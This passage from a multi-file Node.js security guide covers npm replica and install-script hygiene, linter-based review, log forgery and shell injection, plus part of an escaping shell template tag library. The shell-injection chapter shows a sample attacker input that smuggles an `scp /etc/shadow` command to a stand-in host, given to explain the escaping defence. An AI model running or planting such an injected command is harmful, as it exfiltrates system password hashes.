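function findNpmInvocations(pkg) {
  const problems = [];
  for (const [name, command] of Object.entries(pkg.scripts || {})) {
    if (NPM_COMMAND.test(command)) {
      problems.push(`scripts.${name} invokes npm: ${command}`);
    }
  }
  return problems;
}
```

A presubmit hook could run this over each changed `package.json` and fail when the returned list is non-empty.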

Finally, all Node.js projects need to have a symlink to the
organization's `.yarnrc` at their root that points to the local
replica.

## Running install scripts safely

Running `{pre-,,post-}install` scripts without developer privileges
prevents malicious code (see [MTP][]) from:

*  Modifying code in a local repository.
*  Committing code as the developer, possibly signing commits
   with keys available to `ssh-agent`.
*  Adding scripts to directories on a developer's `$PATH`.
*  Abusing `npm login` or [`yarn login`][] credentials.

Ideally one would run these on a separate sandboxed machine.
Many organizations have access to banks of machines that
test client-side JavaScript apps by running instrumented
browsers and include Windows boxes for testing IE, and
MacOS boxes for testing Safari.  These banks might also
run install scripts without any developer privileges and
with an airgap between the install scripts and source code
files.

If that doesn't work, running install scripts via `sudo -u `*guest*
where *guest* is a low-privilege account makes it harder for the
install script to piggyback on the developer's private keys.

## Proposed Solutions

A local replica manager should make it easy to:

*  Locally cache npm packages so that an interruption in service by
   `registry.npmjs.org` doesn't affect the ability to deploy a security
   update to existing products.
*  Cherrypick versions from `registry.npmjs.org` so that reviewers can
   exercise oversight, and remove versions with known,
   security-relevant regressions.
*  Publish one's own local patches to packages in the global
   namespace, so that incident responders can work around zero-days
   without waiting for upstream.
*  Associate organization specific metadata with packages and versions
   so that the organization can aggregate lessons learned about
   specific dependencies.
*  Cross-compile binaries so that developers do not have to run
   installation scripts on their own machines.

The local repository providers mentioned above address many of these,
but we have not comprehensively evaluated any of them.

Cherrypicking a version should not require using a tool other than
`npm` or `yarn`.  Cherrypicking a version when `npm` communicates
directly with `registry.npmjs.org` should be a no-op, so the `npm`
interface could support cherrypicking.

Existing tools do not prevent abuse of developer privileges by install
scripts.  The first tool to do so should be preferred by security
conscious organizations.

Ideally `npm` and `yarn` would be configurable so that they could
delegate running installation scripts to a local replica manager.  We
would like to see local replica managers compete on their ability to
do so securely.  We realize that this is no small change, but abuse of
developer privileges can directly affect source base integrity.

If an `npm` configuration could opt into sending the project name from
`package.json` then local replica managers could make it easier for
incident responders to find projects affected by a security alert for
a specific module.


[James Shore]: https://www.letscodejavascript.com/v3/blog/2014/03/the_npm_debacle
[package locks]: https://docs.npmjs.com/files/package-lock.json
[npm Enterprise]: https://www.npmjs.com/enterprise
[configured to use a different registry]: https://docs.npmjs.com/misc/config
[Artifactory]: https://www.jfrog.com/confluence/display/RTF/Npm+Registry#NpmRegistry-AdvancedConfiguration
[Sinopia]: https://www.npmjs.com/package/sinopia#override-public-packages
[Verdaccio]: https://github.com/verdaccio/verdaccio/blob/66b2175584e29587be0fd7979ea9f9c73b08b8e9/docs/use-cases.md#override-public-packages
[yarn]: https://github.com/yarnpkg/yarn
[security-wg process]: https://github.com/nodejs/security-wg/blob/master/processes/third_party_vuln_process.md
[0DY]: ../chapter-1/threat-0DY.md
[MTP]: ../chapter-1/threat-MTP.md
[offline mirror]: https://yarnpkg.com/blog/2016/11/24/offline-mirror/
[interactive shell]: http://www.tldp.org/LDP/abs/html/intandnonint.html#IITEST
[CVE-IDs]: https://en.wikipedia.org/wiki/Common_Vulnerabilities_and_Exposures#CVE_identifiers
[saccone]: https://www.kb.cert.org/CERT_WEB/services/vul-notes.nsf/6eacfaeab94596f5852569290066a50b/018dbb99def6980185257f820013f175/$FILE/npmwormdisclosure.pdf
[`yarn login`]: https://yarnpkg.com/en/docs/cli/login
[trojan]: https://en.wikipedia.org/wiki/Trojan_horse_(computing)


================================================
FILE: chapter-5/oversight.md
================================================
# Oversight


## Problem

Threats: [BOF][] [CRY][] [DEX][] [EXF][] [LQC][] [QUI][] [RCE][] [SHP][]

Manually reviewing third party modules for known security problems
is time consuming.

Having developers wait for such review unnecessarily slows down
development.

Our engineering processes ought not force us to choose between
forgoing sanity checks and shipping code in a timely manner.


## Background

[JSConformance][] allows a project team to specify a policy for
Closure JavaScript.  This policy can encode lessons learned about APIs
that are prone to misuse.  By taking into account type information
about arguments and `this`-values it can distinguish problematic
patterns like `setTimeout(aString, dt)` from unproblematic ones like
`setTimeout(aFunction, dt)`.

[TSLint][tslint] and [ESLint][eslint] both allow custom rules, so they can
be extended as a project or developer community identifies Good and
Bad parts of JavaScript for their particular context.


## A possible solution

### Encode lessons learned by the community in linter policies

Instead of having security specialists review lots of code,
we could have them focus on improving tools.
Some APIs and idioms are more prone to misuse than others, and some
should be deprecated in favor of more robust ways of expressing the
same idea.  As the community reaches a rough consensus that a code
pattern is prone to misuse or there is a more robust alternative, we
could try to encode that knowledge in an automatable policy.

Linters are not perfect.  There are no sound production-quality static
type systems for JavaScript, so its linters are also necessarily
heuristic.  TSLint typically has more fine-grained type information
available than ESLint, so there are probably more anti-patterns that
TSLint can identify with an acceptable false-positive rate than
ESLint, but reports about what can and can't be expressed in ESLint
might still be useful to its maintainers.

Linters can reduce the burden on reviewers by enabling computer aided
code review &mdash; helping reviewers focus on areas that use powerful
APIs, and giving a sense of the kinds of problems to look out for.

They can also give developers a sense of how controversial a review
might be, and guide them in asking the right kinds of questions.

Custom policies can also help educate developers about alternatives.

The rule below specifies an anti-pattern for client-side JavaScript
in machine-checkable form, assigns it a name, has a short summary that
can appear in an error message, and a longer description or
documentation URL that explains the reasoning behind the rule.

It also documents a number of known exceptions to the rule, for
example, APIs that wrap `document.write` to do additional checks.

```pb
requirement: {
  rule_id: 'closure:documentWrite'
  type: BANNED_PROPERTY
  error_message: 'Using Document.prototype.write is not allowed. '
      'Use goog.dom.safe.documentWrite instead.'
      ''
      'Any content passed to write() will be automatically '
      'evaluated in the DOM and therefore the assignment of '
      'user-controlled, insufficiently sanitized or escaped '
      'content can result in XSS vulnerabilities.'
      ''
      'Document.prototype.write is bad for performance as it '
      'forces document reparsing, has unpredictable semantics '
      'and disallows many optimizations a browser may make. '
      'It is almost never needed.'
      ''
      'Exceptions allowed for:'
      '* writing to a completely new window such as a popup '
      '  or an iframe.'
      '* frame busting.'
      ''
      'If you need to use it, use the type-safe '
      'goog.dom.safe.documentWrite wrapper, or directly '
      'render a Strict Soy template using '
      'goog.soy.Renderer.prototype.renderElement (or similar).'

  value: 'Document.prototype.write'
  value: 'Document.prototype.writeln'

  # These uses have been determined to be safe by manual review.
  whitelist: 'javascript/closure/async/nexttick.js'
  whitelist: 'javascript/closure/base.js'
  whitelist: 'javascript/closure/dom/safe.js'
}
```

----

We propose a project that maintains a set of linter policies per language:

*  A **common** policy suitable for all projects that identifies
   anti-patterns that are generally regarded as bad practice by the
   community with a low false positive rate.
*  A **strict** policy suitable for projects that are willing to
   deal with some false positives in exchange for identifying more
   potential problems.
*  An **experimental** policy that projects that want to contribute to
   linter policy development can use.
   New rules go here first, so that rule maintainers can get feedback
   about their impact on real code.
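With ESLint, the three tiers might be expressed as layered configuration objects, each including the tier before it. This is a sketch under stated assumptions: the rules in `common` and `strict` are real core ESLint rules, but their placement in tiers is illustrative rather than an agreed community policy, and `local/no-string-timers` is a hypothetical custom rule assumed to come from an installed plugin named `local`.

```js
'use strict';
// Sketch of tiered policies as ESLint configuration objects.
const common = {
  rules: {
    'no-eval': 'error',
    'no-implied-eval': 'error',
    'no-new-func': 'error',
  },
};

// Each tier includes everything in the tier before it.
const strict = {
  rules: {
    ...common.rules,
    'no-script-url': 'error',
    'no-proto': 'error',
    'no-extend-native': 'error',
  },
};

// New rules start as warnings so maintainers can measure their
// false-positive rate on real code before promoting them.
// Assumes a hypothetical plugin named `local` is installed.
const experimental = {
  plugins: ['local'],
  rules: {
    ...strict.rules,
    'local/no-string-timers': 'warn',
  },
};

module.exports = { common, strict, experimental };
```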


### Decouple Reviews from Development

Within a large organization, there are often multiple review cycles, some
concurrent:

-  Reviews of designs and use cases where developers gather information
   from others.
-  Code reviewers critique pull requests for correctness, maintainability,
   testability.
-  Release candidate reviews where professional testers examine a
   partial system and try to break it.
-  Pre-launch reviews where legal, security & privacy, and other
   concerned parties come to understand the state of the system and
   weigh in on what they need to be able to support its deployment.
-  Limited releases where trusted users get to use an application.

Reviews should happen early and late.  When designing a system or a
new feature, technical leads should engage specialists.  Before
shipping, they should circle back to double check the implementation.
During rapid development though, developers should drive development
&mdash; they may ask questions, and may receive feedback (solicited
and not), but ought not have to halt work while they wait for reviews
from specialists.

Some changes have a higher security impact than others, so
some will require review by security specialists, but most will not.

During an ongoing security review, security specialists can contribute
use cases and test cases; file issues; and help to integrate tools
like linters, fuzzers, and vulnerability scanners.

As described in "[Keeping your dependencies close][]", new third-party
modules are of particular interest to security specialists, but
shouldn't require security review before developers use them on an
experimental basis.

There are many workflows that allow people to work independently
and later circle back so that nothing falls through the cracks.
Below is one that has worked in similar contexts:

1. The developer (or the automated import script) files a
   tracking issue that is a prerequisite for pre-launch review.
2. If the developer later finds out that they don't plan on using
   the unreviewed module, they can close the tracking issue.
3. The assigned security specialist asks follow-up questions and
   reports their findings via the tracking issue.
4. A common pre-launch script queries a module metadata
   database maintained by security to identify still-unvetted
   dependencies.
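Step 4 could be sketched as below. Both inputs are assumptions: `lock` is a parsed `package-lock.json` in the lockfileVersion 1 layout, and `reviews` is a hypothetical stand-in for security's module metadata database, reduced here to a `Map` from `name@version` to a review status.

```js
'use strict';
// Sketch of a pre-launch check.  Both inputs are assumptions:
//  - `lock` is a parsed package-lock.json using the lockfileVersion 1
//    layout, where `dependencies` maps each name to
//    { version, dev, dependencies } and nested entries record
//    packages installed below another package.
//  - `reviews` stands in for security's module metadata database:
//    a Map from 'name@version' to a review status such as 'vetted'.
function findUnvettedDependencies(lock, reviews) {
  const unvetted = new Set();
  function visit(deps) {
    for (const [name, info] of Object.entries(deps || {})) {
      if (info.dev) continue;  // dev-only dependencies don't ship
      const key = `${name}@${info.version}`;
      if (reviews.get(key) !== 'vetted') unvetted.add(key);
      visit(info.dependencies);
    }
  }
  visit(lock.dependencies);
  return [...unvetted].sort();
}
```

A launch checklist could block while this list is non-empty and link each entry to the tracking issue filed in step 1.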

[BOF]: ../chapter-1/threat-BOF.md
[CRY]: ../chapter-1/threat-CRY.md
[DEX]: ../chapter-1/threat-DEX.md
[EXF]: ../chapter-1/threat-EXF.md
[LQC]: ../chapter-1/threat-LQC.md
[RCE]: ../chapter-1/threat-RCE.md
[SHP]: ../chapter-1/threat-SHP.md
[QUI]: ../chapter-1/threat-QUI.md
[JSConformance]: https://github.com/google/closure-compiler/wiki/JS-Conformance-Framework
[tslint]: https://palantir.github.io/tslint/develop/custom-rules/
[eslint]: https://eslint.org/docs/developer-guide/working-with-rules-new#runtime-rules
[Keeping your dependencies close]: ../chapter-4/close_dependencies.md


================================================
FILE: chapter-6/failing.md
================================================
# When all else fails

## Background

The ["Incident Handlers Handbook"][SANS] discusses at length how to
respond to security breaches, but the main takeaways are:

*  You need to do work before incidents happen to be able to
   respond effectively.
*  Similar measures can lower the rate of incidents.
*  You will still have incidents.
*  Being in a position to respond effectively can limit damage when
   incidents occur.

Node's proposed [security working group][security-wg]
includes in its charter measures to route information about
vulnerabilities and fixes to the right places, and coordinate response
and disclosure.

Package monitoring services like [nodesecurity], GitHub's
[package graph][github graph], [snyk][], and the
[nodejs-sec list][nodejs-sec] aim to help vulnerability reports get to
those who need them.


## Problem

Threats: [0DY][]

Node's security working group is working on a lot of preparedness
issues, so we only address a few.

### Naming is hard

Each of the groups mentioned above is doing great work trying to help
patches get to those who need them.  Each seems to be rolling their own
naming scheme for vulnerabilities.

The computer security community has a
[centralized naming scheme][CVE-IDs] for vulnerability reports so that
reports don't fall through the cracks.  Security responders rarely
have the luxury of dealing with a single stack, much less a single
layer of that stack, so mailing lists are not sufficient &mdash; if
reporters roll their own naming scheme or only disclose via
unstructured text, reports will fall through the cracks.

### Logging

When trying to diagnose a problem, responders often look to log files.
There has been much written on how to protect logs from
[forgery][log injection].

```js
console.log(s);
```

on a stock node runtime allows an attacker who controls `s` to write
arbitrary content to the log.

```js
console.log('MyModule: ' + s);
```

is a bit better.  An attacker has to insert a newline character into
`s` to forge another module's log prefix, and can't get rid of the
original one.
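A minimal illustration of that forgery, assuming a hypothetical attacker-controlled string `s`: one embedded newline is enough to produce a log line that appears to come from a different module.

```js
// Hypothetical attacker-controlled input containing an embedded newline.
const s = 'login failed\nOtherModule: admin password reset'

// The text `console.log('MyModule: ' + s)` would write, split into log lines.
const written = 'MyModule: ' + s
const lines = written.split('\n')

console.log(lines[0]) // MyModule: login failed
console.log(lines[1]) // OtherModule: admin password reset   <- forged prefix
```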


## Success Criteria

Incident responders would have the tools necessary to do their jobs if

*  Security specialists can subscribe to a stream of notifications
   that include the vast majority of actionable security disclosures.
*  Responders can narrow down which code generated which log entries.


## Possible solutions

### Naming

Use CVE-IDs if at all possible when disclosing a vulnerability.  There
is a CVE Numbering Authority (CNA) for Node.js, but it doesn't cover
non-core npm modules; other CNAs cover runtime dependencies like
OpenSSL.  If no other CNA is appropriate, MITRE will issue an ID.
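Because CVE-IDs follow a fixed syntax (`CVE-`, a four-digit year, and a sequence number of four or more digits), tooling can pull them out of otherwise unstructured disclosures such as mailing-list posts. A minimal sketch; `extractCveIds` is a hypothetical helper, not part of any existing package, and the post text is made up for illustration.

```js
// Hypothetical helper: collects the distinct CVE-IDs mentioned in free text.
// CVE-IDs look like CVE-YYYY-NNNN, where the sequence number has 4+ digits.
function extractCveIds (text) {
  const matches = String(text).match(/\bCVE-\d{4}-\d{4,}\b/g) || []
  return [ ...new Set(matches) ]
}

const post = 'Fixes CVE-2017-0001 (and CVE-2017-0001 again); see also ' +
  'CVE-2018-12345.  Not an ID: CVE-2018-123.'
console.log(extractCveIds(post)) // [ 'CVE-2017-0001', 'CVE-2018-12345' ]
```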

### Logging

On module load, the builtin `module.js` creates a new version of
`require` for each module so that it can make sure that the module path
gets passed as the module parent parameter.

The same mechanism could create a distinct `console` logger for each
module that narrows down the source of a message, and makes it
unambiguous where one message ends and the next starts.  For example:

1. Replace all `/\r\n?/g` in the log message text with `'\n'`
   and emit a CRLF after the log message to prevent forgery by
   line splitting.
2. Prefix it with the module filename and a colon.

With this, an incident responder reading a log message can reliably
tell that the module mentioned is where the log message originated, as
long as the attacker didn't get write access to the log file.
Preventing log deletion by other processes is better handled by
Linux's `FS_APPEND_FL` and similar mechanisms than in node.
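A minimal userland sketch of steps 1 and 2, assuming a hypothetical `makeModuleLogger` factory. Node does not provide per-module loggers; under the proposal above, the module loader would create one alongside each module's `require`. The logger writes to any object with a `write` method so its output can be inspected.

```js
// Hypothetical sketch: Node has no per-module logger. The proposal above
// would have the module loader create one next to each module's `require`.
function makeModuleLogger (moduleFilename, stream = process.stdout) {
  return function log (...args) {
    // Simplified formatting: console.log also handles format strings and
    // inspects objects; here every argument is just converted with String().
    const text = args.map(String).join(' ')
    // Step 1: turn every CR and CRLF inside the message into LF, so the only
    // CRLF written is the record terminator appended below.
    const body = text.replace(/\r\n?/g, '\n')
    // Step 2: prefix the record with the module filename and a colon.
    stream.write(`${moduleFilename}: ${body}\r\n`)
  }
}

// Usage with an in-memory stream so the records can be inspected.
const written = []
const log = makeModuleLogger(
  '/app/node_modules/my-module/index.js', // hypothetical path
  { write: (chunk) => written.push(chunk) })

log('login failed\r\nOtherModule: admin password reset')
```

A reader that splits the log on CRLF sees a single record attributed to `my-module`; the forged `OtherModule:` text stays inside that record.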

[nodesecurity]: https://nodesecurity.io/advisories
[github graph]: https://github.com/blog/2447-a-more-connected-universe
[snyk]: https://snyk.io/vuln?packageManager=npm
[nodejs-sec]: https://groups.google.com/group/nodejs-sec
[CVE-IDs]: https://en.wikipedia.org/wiki/Common_Vulnerabilities_and_Exposures#CVE_identifiers
[log injection]: https://www.owasp.org/index.php/Log_Injection
[0DY]: ../chapter-1/threats.md
[SANS]: https://www.sans.org/reading-room/whitepapers/incident/incident-handlers-handbook-33901
[security-wg]: https://github.com/nodejs/security-wg


================================================
FILE: chapter-7/child-processes.md
================================================
# Shell injection

Threats: [SHP][]

The [`shelljs` module][shelljs] allows access to the system
shell.  We focus on `shelljs`, but similar arguments apply to builtins
like `child_process.spawn(cmd, { shell: ... })` ([docs][cp.spawn]) and
similar modules.
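For contrast, a minimal sketch of the shell-free path: when a `child_process` function such as `execFileSync` runs a program without the `shell` option, arguments travel as a separate argv array and no shell interprets their metacharacters. To stay portable, the child here is `node` itself (`process.execPath`), which echoes its first argument; the hostile value is a made-up example.

```js
const { execFileSync } = require('child_process')

// A made-up value full of shell metacharacters.
const x = "'; echo pwned > /tmp/pwned; $(id) `uname`"

// No `shell` option, so x reaches the child verbatim as one argv entry.
// With `node -e script arg`, the child sees `arg` as process.argv[1].
const out = execFileSync(
  process.execPath,
  [ '-e', 'process.stdout.write(process.argv[1])', x ],
  { encoding: 'utf8' })

console.log(out === x) // true: nothing in x was interpreted by a shell
```

This only helps when no shell is needed; the rest of this section is about code that does invoke one.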

`shelljs` has some nice programmatic APIs for common shell commands
that escape arguments.

It also provides `shell.exec`, which allows full access to the shell,
including interpretation of shell metacharacters.

Solving [shell injection][SHP] is a much harder problem than query
injection since shell scripts tend to call other shell scripts, so
properly escaping arguments to one script doesn't help if the script
sloppily composes a sub-shell.  The problem of tools that trust their
inputs is not limited to shell scripts: see discussion of image decoders
in [BOF][].

The [shell grammar][] has more layers of interpretation, so it is
arguably more complex than any one SQL grammar.

We can do much better than string concatenation though.  The code
below is vulnerable.

```js
shelljs.exec("executable '" + x + "'")
```

If an attacker causes

```js
x = " '; scp /etc/shadow evil@evil.org:; echo ' ";
```

then what gets passed to the shell is

```sh
executable ' '; scp /etc/shadow evil@evil.org:; echo ' '
```

Instead, consider:

```js
shelljs.exec`executable ${x}`

shelljs.exec`executable '${x}'`
```

This use of tagged templates is roughly equivalent to

```js
shelljs.exec(["executable ", ""], x)

shelljs.exec(["executable '", "'"], x)
```

This way, when control reaches `shelljs`, it knows which strings came
from the developer: `["executable ", ""]`, and which are inline
expressions: `x`.  If `shelljs` properly escapes the latter, it
prevents the breach above.
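A minimal sketch of what "properly escapes" can mean, assuming a hypothetical tag `shq`. It uses the same single-quoting strategy as `emsq` in the accompanying `sh-template-tag` example, but unlike that implementation it does not track quoting context, so it is only safe for values interpolated at top level (the first form above, not the pre-quoted second form).

```js
// Hypothetical tag: single-quotes every interpolated value for a POSIX shell.
// It does NOT track quoting context in the static strings, so values must
// appear at top level, outside any quotes written by the developer.
function shq (strings, ...values) {
  let out = strings[0]
  for (let i = 0; i < values.length; ++i) {
    // Inside '...' nothing is special except ' itself, so each embedded '
    // becomes '"'"' : close the quote, emit a double-quoted ', reopen.
    const quoted = "'" + String(values[i]).replace(/'/g, `'"'"'`) + "'"
    out += quoted + strings[i + 1]
  }
  return out
}

const x = " '; scp /etc/shadow evil@evil.org:; echo ' "
console.log(shq`executable ${x}`)
// executable ' '"'"'; scp /etc/shadow evil@evil.org:; echo '"'"' '
```

The shell now sees a single argument containing the attacker's text, rather than three commands.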

The accompanying example ([code][sh-code]) includes a tag
implementation for `sh` and `bash` that recognizes complex nesting
semantics.

We can't, working within the confines of Node, prevent poorly written
command line tools from breaking when exposed to untrusted inputs, but
we can make sure that we preserve the developer's intent when they
write code that invokes command line tools.  For projects that have
legitimate reasons for invoking sub-shells, consistently using
template tags like this solves some problems and makes it more likely
that effort spent hardening command line tools will yield fruit.

[shell grammar]: http://pubs.opengroup.org/onlinepubs/9699919799/utilities/V3_chap02.html#tag_18_10
[shelljs]: https://www.npmjs.com/package/shelljs
[cp.spawn]: https://nodejs.org/api/child_process.html#child_process_child_process_spawn_command_args_options
[SHP]: ../chapter-1/threat-SHP.md
[BOF]: ../chapter-1/threat-BOF.md
[sh-code]: https://github.com/mikesamuel/sh-template-tag


================================================
FILE: chapter-7/examples/sh/index.js
================================================
/**
 * @license
 * Copyright 2017 Google LLC
 *
 * Licensed under the Apache License, Version 2.0 (the "License");
 * you may not use this file except in compliance with the License.
 * You may obtain a copy of the License at
 *
 *     https://www.apache.org/licenses/LICENSE-2.0
 *
 * Unless required by applicable law or agreed to in writing, software
 * distributed under the License is distributed on an "AS IS" BASIS,
 * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 * See the License for the specific language governing permissions and
 * limitations under the License.
 */

/**
 * @fileoverview
 * Usage:
 * {@code
 * const sh = require('sh-template-tag')
 * sh`echo ${foo}`
 * }
 */

const crypto = require('crypto')
const {
  memoizedTagFunction,
  trimCommonWhitespaceFromLines,
  TypedString
} = require('template-tag-common')

/** A regex chunk that matches only str, literally. */
function reEsc (str) {
  return str.replace(/[\^\x5b\x5d\-\\]/g, '\\$&')
    .replace(/[*+(){}|$/.]/g, '[$&]')
}

/** The union of the given regex chunks. */
function reUnion (alternatives) {
  return `(?:${alternatives.join('|')})`
}

const ALL_DELIMS = [ '"', '\'', '#', '`', '$((', '$(', '${', '(', '<<-', '<<' ]
const NLS = [ '\n', '\r\n', '\r' ]

// Embedders take the value to embed and return the text to substitute.
/** Embeds a value where a single quoted string token is allowed. */
function emsq (x) {
  if (x instanceof ShFragment) {
    return x.content
  }
  return `'${emisq(x)}'`
}
/** Embeds a string in an opened single quoted string */
function emisq (x) {
  if (x == null) { // eslint-disable-line no-eq-null
    // Intentionally matches undefined
    return ''
  }
  return String(x).replace(/'/g, `'"'"'`)
}
/** Embeds a string in an opened double quoted string */
function emidq (x) {
  if (x == null) { // eslint-disable-line no-eq-null
    // Intentionally matches undefined
    return ''
  }
  return String(x).replace(/[$"\\]/g, '\\$&')
}
/** Embeds in a comment, replacing the content with a space */
function emsp (x) {
  return ' '
}
/**
 * Embeds in heredoc.
 * We handle rewriting HEREDOC labels to avoid collisions later.
 */
function emhd (x) {
  return String(x)
}

/**
 * Maps start delimiters to their end delimiters and whether
 * '\\' and start delimiters are significant.
 *
 * Properties:
 * .ends: delimiters that end blocks that start with the key.
 * .embed: a function that converts values to content that embeds within
 *         the block.
 * .escapes: true iff backslash escapes a character that might otherwise
 *         participate in a start or end delimiter, or another backslash.
 * .nests: list of start delimiters that are significant in the block.
 *
 * Extra properties derived from above:
 * .bodyRegExp: matches a prefix of a string that is a chunk of body content.
 * .startRegExp: matches a start delimiter in nests at start of input
 * .endRegExp: matches an end delimiter at start of input.
 */
const DELIMS = {
  '': { ends: [], embed: emsq, escapes: false, nests: ALL_DELIMS },
  '"': { ends: [ '"' ], embed: emidq, escapes: true, nests: [ '`', '$((', '$(', '${' ] },
  '\'': { ends: [ '\'' ], embed: emisq, escapes: false, nests: [] },
  '`': { ends: [ '`' ], embed: emsq, escapes: true, nests: ALL_DELIMS },
  '$((': { ends: [ '))' ], embed: emsq, escapes: true, nests: ALL_DELIMS },
  '$(': { ends: [ ')' ], embed: emsq, escapes: true, nests: ALL_DELIMS },
  '${': { ends: [ '}' ], embed: emsq, escapes: true, nests: ALL_DELIMS },
  '(': { ends: [ ')' ], embed: emsq, escapes: true, nests: ALL_DELIMS },
  // '#' requires special handling below since it must follow whitespace
  '#': { ends: NLS, embed: emsp, escapes: false, nests: [] },
  // Heredoc requires special handling below to handle the nonce.
  '<<': { ends: NLS, embed: emhd, escapes: false, nests: [] },
  '<<-': { ends: NLS, embed: emhd, escapes: false, nests: [] }
}

// Flesh out the DELIMS table with derived information used by the lexer.
do {
  ((() => {
    for (const startDelim in DELIMS) {
      const delimInfo = DELIMS[startDelim]
      const { nests, ends, escapes } = delimInfo

      const startsPattern = nests.length ? reUnion(nests.map(reEsc)) : '(?!)'
      const endsPattern = ends.length ? reUnion(ends.map(reEsc)) : '(?!)'
      // Any number of (see Kleene-* below)
      let pattern = '^(?:'
      if (escapes) {
        // Any escaped character or ...
        pattern += '[\\\\][\\s\\S]|'
      }

      // Not one of ends
      pattern += `(?!${endsPattern}`
      if (nests.length) {
        pattern += `|${startsPattern}`
      }
      pattern += ')'

      // Character to match.
      pattern += escapes ? '[^\\\\]' : '[\\s\\S]'
      pattern += ')*'
      delimInfo.bodyRegExp = new RegExp(pattern)
      delimInfo.endRegExp = new RegExp(`^${endsPattern}`)
      delimInfo.startRegExp = new RegExp(`^${startsPattern}`)
    }
  })())
} while (0)

/** Template tag that creates a new Error with a message. */
function fail (strs, ...dyn) {
  let [ msg ] = strs
  for (let i = 0; i < dyn.length; ++i) {
    msg += JSON.stringify(dyn[i]) + strs[i + 1]
  }
  return new Error(msg)
}

const HASH_COMMENT_PRECEDER = /[\t\n\r (]$/

/** Skip over "<<" or "<<-" prefix to get the label. */
function heredocLabel (startDelim) {
  return startDelim.substring(2 + (startDelim[2] === '-'))
}

function heredocBodyRegExp (label) {
  return new RegExp(
    // Maximal run of characters that stops before any CR or LF
    // immediately followed by the label and another CR or LF,
    // i.e. before the line that ends the heredoc.
    `^(?:[^\n\r]|(?![\n\r]${label}[\r\n])[\n\r])*`)
}

const START_CONTEXT = Object.freeze([ '', 0, 0, 0 ])

/**
 * Returns a function that can be fed chunks of input and
 * which returns the context in which interpolation occurs.
 * If the returned function is fed null, then it will
 * throw an error only if not in a valid end context.
 */
function makeLexer () {
  // A stack of (
  //     start delimiter,
  //     position of start in concatenation of chunks,
  //     position of start in current chunk,
  //     delimiter length in chunk)
  // for each start delimiter for which we have not yet seen
  // an end delimiter.
  const delimiterStack = [ START_CONTEXT ]
  let position = 0

  function propagateContextOverChunk (origChunk) {
    // A suffix of origChunk that we consume as we tokenize.
    let chunk = origChunk
    while (chunk) {
      const top = delimiterStack[delimiterStack.length - 1]
      const [ topStartDelim ] = top
      let delimInfo = DELIMS[topStartDelim]
      let bodyRegExp = null
      if (delimInfo) {
        bodyRegExp = delimInfo.bodyRegExp // eslint-disable-line prefer-destructuring
      } else if (topStartDelim[0] === '<' && topStartDelim[1] === '<') {
        bodyRegExp = heredocBodyRegExp(heredocLabel(topStartDelim))
        delimInfo = DELIMS['<<']
      } else {
        throw fail`Failed to maximally match chunk ${chunk}`
      }
      const match = bodyRegExp.exec(chunk)
      if (!match) {
        // Can occur if a chunk ends in '\\' and bodyPattern
        // allows escapes.
        throw fail`Unprocessable content ${chunk} in context ${top}`
      }

      chunk = chunk.substring(match[0].length)
      position += match[0].length

      if (!chunk) {
        break
      }

      const afterDelimitedRegion = findDelimitedRegionInChunk(
        delimInfo, origChunk, chunk)
      if (afterDelimitedRegion.length >= chunk.length) {
        throw fail`Non-body content remaining ${chunk} that has no delimiter in context ${top}`
      }
      chunk = afterDelimitedRegion
    }
  }

  /**
   * Look for a matching end delimiter, or, if that fails,
   * apply nesting rules to figure out which kind of start delimiters
   * we might look for.
   *
   * @param delimInfo relating to the topmost delimiter on the stack
   * @param origChunk the entire chunk being lexed
   * @param chunk the suffix of origChunk starting with the delimiter start
   *
   * @return the suffix of chunk after processing any delimiter
   */
  function findDelimitedRegionInChunk (delimInfo, origChunk, chunk) {
    let match = delimInfo.endRegExp.exec(chunk)
    if (match) {
      if (delimiterStack.length === 1) {
        // Should never occur since DELIMS[''] does not have
        // any end delimiters.
        throw fail`Popped past end of stack`
      }
      --delimiterStack.length
      position += match[0].length
      return chunk.substring(match[0].length)
    } else if (delimInfo.nests.length) {
      match = delimInfo.startRegExp.exec(chunk)
      if (match) {
        return propagateContextOverDelimiter(origChunk, chunk, match)
      }
    }
    return chunk
  }

  /**
   * Does some delimiter specific parsing.
   *
   * @param origChunk the entire chunk being lexed
   * @param chunk the suffix of origChunk starting with the delimiter start
   * @param match the match of the delimiter's startRegExp
   */
  function propagateContextOverDelimiter (origChunk, chunk, match) {
    let [ start ] = match
    let delimLength = start.length
    if (start === '#') {
      const chunkStartInWhole = origChunk.length - chunk.length
      if (chunkStartInWhole === 0) {
        // If we have a chunk that starts with a
        // '#' then we don't know whether two
        // ShFragments can be concatenated to
        // produce an unambiguous ShFragment.
        // Consider
        //    sh`foo ${x}#bar`
        // If x is a normal string, it will be
        // quoted, so # will be treated literally.
        // If x is a ShFragment that ends in a space
        // '#bar' would be treated as a comment.
        throw fail`'#' at start of ${chunk} is a concatenation hazard.  Maybe use \#`
      } else if (!HASH_COMMENT_PRECEDER.test(origChunk.substring(0, chunkStartInWhole))) {
        // A '#' is not after whitespace, so does
        // not start a comment.
        chunk = chunk.substring(1)
        position += 1
        return chunk
      }
    } else if (start === '<<' || start === '<<-') {
      // If the \w+ part below changes, also change the \w+ in fixupHeredoc.
      const fullDelim = /^<<-?[ \t]*(\w+)[ \t]*[\n\r]/.exec(chunk)
      // http://pubs.opengroup.org/onlinepubs/009695399/utilities/xcu_chap02.html#tag_02_03
      // defines word more broadly.
      // We can't handle that level of complexity here
      // so fail for all heredoc that do not match word.
      if (!fullDelim) {
        throw fail`Failed to find heredoc word at ${chunk}.  Use a nonce generator instead of .`
      }
      start += fullDelim[1]
      delimLength = fullDelim[0].length
    }
    delimiterStack.push(Object.freeze(
      [ start, position, origChunk.length - chunk.length, delimLength ]))
    chunk = chunk.substring(delimLength)
    position += delimLength
    return chunk
  }

  return (wholeChunk) => {
    if (wholeChunk === null) {
      // Test can end.
      if (delimiterStack.length !== 1) {
        throw fail`Cannot end in contexts ${delimiterStack.join(' ')}`
      }
    } else {
      propagateContextOverChunk(String(wholeChunk))
    }
    return delimiterStack[delimiterStack.length - 1]
  }
}

/**
 * A string wrapper that marks its content as a series of
 * well-formed shell tokens.
 */
class ShFragment extends TypedString {}

/** Applies the lexer to the static parts. */
function computeShellContexts (staticStrings) {
  // Collect an array of parsing decisions so that
  // we don't need to rerun the lexer when a particular tag use
  // is executed multiple times.
  const contexts = []
  const { raw } = trimCommonWhitespaceFromLines(staticStrings)

  const lexer = makeLexer()
  for (let i = 0, len = raw.length; i < len; ++i) {
    const chunk = raw[i]
    contexts.push(lexer(chunk))
  }

  // Require valid end state.
  lexer(null)

  return { contexts, raw }
}

/**
